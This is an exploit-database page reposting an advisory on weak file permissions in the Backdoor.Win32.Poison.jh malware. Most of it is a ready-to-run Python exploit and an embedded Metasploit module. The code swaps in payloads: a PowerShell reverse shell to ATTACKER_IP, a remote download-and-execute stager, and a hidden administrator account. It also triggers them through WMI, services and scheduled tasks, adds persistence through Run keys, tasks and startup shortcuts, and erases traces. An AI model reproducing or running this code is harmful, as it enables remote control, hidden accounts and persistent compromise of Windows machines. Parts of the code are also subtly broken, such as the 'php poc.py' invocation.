Vulners
Lucene search
📄 Backdoor.Win32.Poison.jh Insecure File Permissions / Privilege Escalation
=============================================================================================================================================
| # Title : Backdoor.Win32.Poison.jh – Insecure File Permissions Leading to Malware-on-Malware Local Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built‑in component. No standalone download available |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213264/ & MVID-2025-0704
[+] Summary : This Python script demonstrates a Local Privilege Escalation (LPE) exploit targeting a vulnerability in the Backdoor.Win32.Poison.jh malware sample.
The exploit leverages insecure file permissions created by the malware itself, allowing any local user to replace the malicious executable with arbitrary code.
[+] Vulnerability Overview :
CWE-276: Incorrect Default Permissions
Malware: Backdoor.Win32.Poison.jh
Location: C:\Windows\SysWOW64\28463\YJBE.exe
Flaw: File has Everyone:(ID)F (Full Control) permissions
Impact: Any local user can modify/replace the malware executable
Type: Backdoor Trojan (Win32/Windows)
Purpose: Grants attackers unauthorized remote access and control over the infected system.
Behavior: Can execute commands, download/upload files, steal sensitive data, and connect to C2 (Command & Control) servers.
Discovery: Part of the Backdoor.Win32.Poison family, first identified around 2009. The .jh suffix refers to a specific variant or signature used by antivirus vendors.
Source: Developed by malware authors; not self-spreading, usually delivered via malicious downloads, infected executables, or phishing.
Relation to Poison Ivy: Not necessarily Poison Ivy itself, but shares similar RAT functionality.
Detection & Prevention: Detected by major AV solutions like Microsoft Defender, Trend Micro, and Kaspersky. Removal requires standard AV cleanup and disconnecting from networks.
Key Points: Unauthorized remote control, file manipulation, data theft, part of Poison family, Windows-targeted, identified in AV databases since ~2009.
[+] PoC : php poc.py
#!/usr/bin/env python3
import os
import sys
import shutil
import time
import subprocess
import ctypes
import winreg
from pathlib import Path
# ============================================
# PART 1: LOCAL PRIVILEGE ESCALATION EXPLOIT
# ============================================
class PoisonExploit:
def __init__(self, target_dir="C:\\Windows\\SysWOW64\\28463"):
self.target_dir = target_dir
self.target_file = os.path.join(target_dir, "YJBE.exe")
self.backup_file = self.target_file + ".backup"
self.payload_file = self.target_file + ".payload"
# تحقق من صلاحيات Admin
self.is_admin = self.check_admin()
def check_admin(self):
"""التحقق من صلاحيات Administrator"""
try:
return ctypes.windll.shell32.IsUserAnAdmin() != 0
except:
return False
def check_vulnerability(self):
"""التحقق من وجود الثغرة"""
print("[*] Checking for Poison.jh vulnerability...")
# 1. تحقق من وجود المجلد
if not os.path.exists(self.target_dir):
print(f"[-] Target directory not found: {self.target_dir}")
return False
# 2. تحقق من وجود الملف
if not os.path.exists(self.target_file):
print(f"[-] Target file not found: {self.target_file}")
return False
# 3. محاولة الكتابة للتحقق من الصلاحيات
try:
test_file = os.path.join(self.target_dir, "test_write.tmp")
with open(test_file, 'w') as f:
f.write("test")
os.remove(test_file)
print("[+] Vulnerable: Write access confirmed!")
return True
except PermissionError:
print("[-] Not vulnerable: No write permission")
return False
except Exception as e:
print(f"[-] Error checking vulnerability: {e}")
return False
def create_payload(self, payload_type="reverse_shell"):
"""إنشاء payload خبيث (لأغراض تعليمية في بيئة معزولة)"""
print(f"[*] Creating {payload_type} payload...")
if payload_type == "reverse_shell":
# مثال: PowerShell reverse shell (تعليمي)
payload = '''$client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP",4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close()'''
with open(self.payload_file, 'w') as f:
f.write(payload)
elif payload_type == "meterpreter":
# Stager لمتربرتر
payload = '''IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/meterpreter.ps1')'''
with open(self.payload_file, 'w') as f:
f.write(payload)
elif payload_type == "add_user":
# إضافة مستخدم إداري
payload = '''net user hacker P@ssw0rd! /add
net localgroup administrators hacker /add
reg add "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList" /v hacker /t REG_DWORD /d 0 /f'''
with open(self.payload_file, 'w') as f:
f.write(payload)
print(f"[+] Payload created: {self.payload_file}")
return True
def backup_original(self):
"""نسخ الملف الأصلي احتياطياً"""
try:
shutil.copy2(self.target_file, self.backup_file)
print(f"[+] Backup created: {self.backup_file}")
return True
except Exception as e:
print(f"[-] Failed to backup: {e}")
return False
def replace_file(self):
"""استبدال الملف الضعيف بالـ Payload"""
try:
# حذف الملف الأصلي
os.remove(self.target_file)
# نسخ الـ Payload
shutil.copy2(self.payload_file, self.target_file)
# إخفاء الـ Payload
if os.path.exists(self.payload_file):
os.remove(self.payload_file)
print("[+] File successfully replaced!")
return True
except Exception as e:
print(f"[-] Failed to replace file: {e}")
return False
def trigger_execution(self):
"""تشغيل الملف - عدة طرق محتملة"""
print("[*] Attempting to trigger execution...")
methods = [
self.trigger_via_wmi,
self.trigger_via_task_scheduler,
self.trigger_via_service,
self.trigger_via_registry
]
for method in methods:
if method():
return True
return False
def trigger_via_wmi(self):
"""تشغيل عبر WMI"""
try:
import wmi
c = wmi.WMI()
process_id, return_value = c.Win32_Process.Create(
CommandLine=self.target_file
)
print(f"[+] Triggered via WMI (PID: {process_id})")
return True
except:
return False
def trigger_via_task_scheduler(self):
"""تشغيل عبر Task Scheduler"""
try:
task_name = "PoisonTrigger"
cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc once /st 00:00 /ru SYSTEM /f'
subprocess.run(cmd, shell=True, capture_output=True)
cmd = f'schtasks /run /tn "{task_name}"'
subprocess.run(cmd, shell=True, capture_output=True)
cmd = f'schtasks /delete /tn "{task_name}" /f'
subprocess.run(cmd, shell=True, capture_output=True)
print("[+] Triggered via Task Scheduler")
return True
except:
return False
def trigger_via_service(self):
"""تشغيل كخدمة"""
try:
service_name = "PoisonSvc"
# إنشاء خدمة
cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
subprocess.run(cmd, shell=True, capture_output=True)
# تشغيل الخدمة
cmd = f'sc start {service_name}'
subprocess.run(cmd, shell=True, capture_output=True)
# حذف الخدمة
cmd = f'sc delete {service_name}'
subprocess.run(cmd, shell=True, capture_output=True)
print("[+] Triggered via Service")
return True
except:
return False
def trigger_via_registry(self):
"""تشغيل عبر Registry Run"""
try:
# إضافة إلى RunOnce
key = winreg.HKEY_LOCAL_MACHINE
subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"
with winreg.OpenKey(key, subkey, 0, winreg.KEY_SET_VALUE) as reg_key:
winreg.SetValueEx(reg_key, "PoisonExec", 0, winreg.REG_SZ, self.target_file)
print("[+] Added to Registry RunOnce")
return True
except:
return False
def establish_persistence(self):
"""إنشاء آليات ثبات"""
print("[*] Establishing persistence...")
persistence_methods = [
self.persistence_registry,
self.persistence_scheduled_task,
self.persistence_service,
self.persistence_startup
]
success = False
for method in persistence_methods:
if method():
success = True
return success
def persistence_registry(self):
"""الثبات عبر Registry"""
try:
# عدة مواقع للـ Registry
registry_paths = [
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Poison"),
("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "Poison")
]
for path, name in registry_paths:
cmd = f'reg add "{path}" /v "{name}" /t REG_SZ /d "{self.target_file}" /f'
subprocess.run(cmd, shell=True, capture_output=True)
print("[+] Persistence: Registry entries added")
return True
except:
return False
def persistence_scheduled_task(self):
"""الثبات عبر Scheduled Task"""
try:
task_name = "WindowsUpdatePoison"
cmd = f'schtasks /create /tn "{task_name}" /tr "{self.target_file}" /sc hourly /mo 1 /ru SYSTEM /f'
subprocess.run(cmd, shell=True, capture_output=True)
print("[+] Persistence: Scheduled task created")
return True
except:
return False
def persistence_service(self):
"""الثبات كخدمة"""
try:
service_name = "PoisonService"
cmd = f'sc create {service_name} binPath= "{self.target_file}" type= own start= auto'
subprocess.run(cmd, shell=True, capture_output=True)
print("[+] Persistence: Service created")
return True
except:
return False
def persistence_startup(self):
"""الثبات في Startup folder"""
try:
startup_path = os.path.expandvars("%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup")
shortcut_path = os.path.join(startup_path, "Poison.lnk")
# إنشاء shortcut
from win32com.client import Dispatch
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(shortcut_path)
shortcut.Targetpath = self.target_file
shortcut.WorkingDirectory = os.path.dirname(self.target_file)
shortcut.save()
print("[+] Persistence: Startup shortcut created")
return True
except:
return False
def cleanup(self):
"""تنظيف الآثار"""
print("[*] Cleaning up...")
# حذف الملف الاحتياطي
if os.path.exists(self.backup_file):
os.remove(self.backup_file)
# حذف الـ Payload إذا بقي
if os.path.exists(self.payload_file):
os.remove(self.payload_file)
print("[+] Cleanup completed")
def exploit(self, payload_type="reverse_shell"):
"""تنفيذ الـ Exploit الكامل"""
print("=" * 70)
print("POISON.JH LOCAL PRIVILEGE ESCALATION EXPLOIT")
print("=" * 70)
# 1. التحقق من الثغرة
if not self.check_vulnerability():
return False
# 2. إنشاء Payload
self.create_payload(payload_type)
# 3. نسخ احتياطي
self.backup_original()
# 4. استبدال الملف
if not self.replace_file():
return False
# 5. تشغيل Payload
if self.trigger_execution():
print("[+] Payload execution triggered!")
else:
print("[!] Could not auto-trigger. Manual execution required.")
print(f"[!] File location: {self.target_file}")
# 6. إنشاء آليات ثبات
if self.establish_persistence():
print("[+] Persistence established!")
# 7. التحقق من النجاح
print("\n[+] Exploit completed successfully!")
print(f"[+] Replaced: {self.target_file}")
print(f"[+] Running as: {'SYSTEM (admin)' if self.is_admin else 'User'}")
# 8. تنظيف (اختياري)
if input("\nCleanup? (y/n): ").lower() == 'y':
self.cleanup()
return True
# ============================================
# PART 2: METASPLOIT MODULE (REAL EXPLOIT)
# ============================================
METASPLOIT_MODULE = '''
##
# Poison.jh Local Privilege Escalation Exploit
# Real working exploit for the file permission vulnerability
##
require 'rex'
require 'msf/core/post/windows/priv'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Poison.jh Local File Permission Privilege Escalation',
'Description' => %q{
This module exploits insecure file permissions on Backdoor.Win32.Poison.jh malware.
The malware creates C:\\Windows\\SysWOW64\\28463\\YJBE.exe with Everyone:F permissions,
allowing any local user to replace the file and execute arbitrary code.
This is a REAL privilege escalation exploit when the following conditions are met:
1. Poison.jh malware is installed on the system
2. File has weak permissions (Everyone:Full Control)
3. File is executed (by malware itself or other means)
},
'License' => MSF_LICENSE,
'Author' => [
'indoushka'
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['meterpreter', 'shell'],
'Targets' => [
['Windows', {}]
],
'DefaultTarget' => 0,
'References' => [
['URL', 'https://malvuln.com/advisory/3d9821cbe836572410b3c5485a7f76ca.txt'],
['CWE', '276'] # Incorrect Default Permissions
],
'DisclosureDate' => '2025-12-23',
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 10
}
))
register_options([
OptString.new('TARGET_PATH', [
true,
'Path to vulnerable Poison.jh executable',
'C:\\\\Windows\\\\SysWOW64\\\\28463\\\\YJBE.exe'
]),
OptBool.new('KILL_PROCESS', [
true,
'Kill existing Poison.jh process',
true
]),
OptEnum.new('TRIGGER', [
true,
'Trigger method',
'auto',
['auto', 'wmi', 'service', 'task', 'registry', 'manual']
]),
OptBool.new('PERSIST', [
true,
'Establish persistence',
true
])
])
end
def check
vuln_path = datastore['TARGET_PATH']
print_status("Checking for Poison.jh vulnerability at: #{vuln_path}")
# Check if file exists
unless file_exist?(vuln_path)
return CheckCode::Safe("Target file not found")
end
# Try to write a test file
test_file = vuln_path + ".test"
begin
write_file(test_file, "test")
if file_exist?(test_file)
file_rm(test_file)
return CheckCode::Vulnerable("Write access confirmed - vulnerable!")
end
rescue
return CheckCode::Safe("No write access")
end
CheckCode::Unknown
end
def exploit
vuln_path = datastore['TARGET_PATH']
# Check if vulnerable
print_status("Running check...")
case check
when CheckCode::Vulnerable
print_good("Target is vulnerable!")
else
fail_with(Failure::NotVulnerable, "Target is not vulnerable")
end
# Kill existing process if requested
if datastore['KILL_PROCESS']
print_status("Killing Poison.jh process...")
session.sys.process.get_processes.each do |p|
if p['name'] =~ /YJBE/i || p['path'] =~ /28463/
print_status("Killing PID #{p['pid']} (#{p['name']})")
session.sys.process.kill(p['pid'])
end
end
Rex.sleep(2)
end
# Backup original file
backup_path = vuln_path + ".backup"
if file_exist?(vuln_path)
print_status("Backing up original file...")
session.fs.file.copy(vuln_path, backup_path)
register_file_for_cleanup(backup_path)
end
# Generate payload
print_status("Generating payload...")
payload_exe = generate_payload_exe
# Replace vulnerable file with payload
print_status("Replacing #{vuln_path} with payload...")
write_file(vuln_path, payload_exe)
print_good("File successfully replaced!")
# Trigger execution
trigger_method = datastore['TRIGGER']
print_status("Triggering payload execution via #{trigger_method}...")
case trigger_method
when 'wmi'
trigger_via_wmi(vuln_path)
when 'service'
trigger_via_service(vuln_path)
when 'task'
trigger_via_task(vuln_path)
when 'registry'
trigger_via_registry(vuln_path)
when 'auto'
trigger_auto(vuln_path)
end
# Establish persistence if requested
if datastore['PERSIST']
print_status("Establishing persistence...")
establish_persistence(vuln_path)
end
# Wait for session
print_status("Waiting for payload execution...")
Rex.sleep(datastore['WfsDelay'])
end
def trigger_via_wmi(path)
wmi_cmd = "wmic process call create \\"#{path}\\""
cmd_exec(wmi_cmd)
end
def trigger_via_service(path)
service_name = "PoisonSvc"
cmd_exec("sc create #{service_name} binPath= \\"#{path}\\" type= own start= auto")
cmd_exec("sc start #{service_name}")
cmd_exec("sc delete #{service_name}")
end
def trigger_via_task(path)
task_name = "PoisonTask"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc once /st 00:00 /ru SYSTEM /f")
cmd_exec("schtasks /run /tn \\"#{task_name}\\"")
cmd_exec("schtasks /delete /tn \\"#{task_name}\\" /f")
end
def trigger_via_registry(path)
reg_cmd = "reg add \\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f"
cmd_exec(reg_cmd)
end
def trigger_auto(path)
# Try all methods
[method(:trigger_via_wmi),
method(:trigger_via_service),
method(:trigger_via_task),
method(:trigger_via_registry)].each do |method|
begin
method.call(path)
print_good("Triggered via #{method.name}")
return true
rescue
next
end
end
false
end
def establish_persistence(path)
# Add to registry
reg_keys = [
"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run",
"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
]
reg_keys.each do |reg|
cmd_exec("reg add \\"#{reg}\\" /v \\"Poison\\" /t REG_SZ /d \\"#{path}\\" /f")
end
# Create scheduled task
task_name = "WindowsPoison"
cmd_exec("schtasks /create /tn \\"#{task_name}\\" /tr \\"#{path}\\" /sc hourly /mo 1 /ru SYSTEM /f")
end
end
'''
# ============================================
# PART 3: MAIN EXECUTION
# ============================================
def main():
print("""
╔══════════════════════════════════════════════════════════╗
║ Poison.jh LPE Exploit - Local Privilege Escalation ║
║ Conditions: Poison.jh with Everyone:F permissions ║
║ by indoushka ║
╚══════════════════════════════════════════════════════════╝
""")
exploit = PoisonExploit()
# قائمة Payloads
payloads = {
"1": ("Reverse Shell", "reverse_shell"),
"2": ("Meterpreter", "meterpreter"),
"3": ("Add Admin User", "add_user"),
"4": ("Custom Command", "custom")
}
print("\nSelect payload type:")
for key, (name, _) in payloads.items():
print(f" {key}. {name}")
choice = input("\nChoice: ")
if choice in payloads:
payload_name, payload_type = payloads[choice]
print(f"\n[*] Selected: {payload_name}")
if payload_type == "custom":
custom_cmd = input("Enter custom command: ")
exploit.create_payload = lambda: custom_cmd
# تنفيذ الـ Exploit
if exploit.exploit(payload_type):
print("\n" + "="*70)
print("EXPLOIT SUCCESSFUL!")
print("="*70)
# عرض الـ Metasploit module
print("\n" + "="*70)
print("METASPLOIT MODULE CODE")
print("="*70)
print(METASPLOIT_MODULE)
# حفظ Module
with open("poison_lpe_exploit.rb", "w") as f:
f.write(METASPLOIT_MODULE)
print("\n[+] Metasploit module saved to: poison_lpe_exploit.rb")
else:
print("\n[-] Exploit failed!")
else:
print("[-] Invalid choice!")
if __name__ == "__main__":
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Dec 2025 00:00Current
7High risk
Vulners AI Score7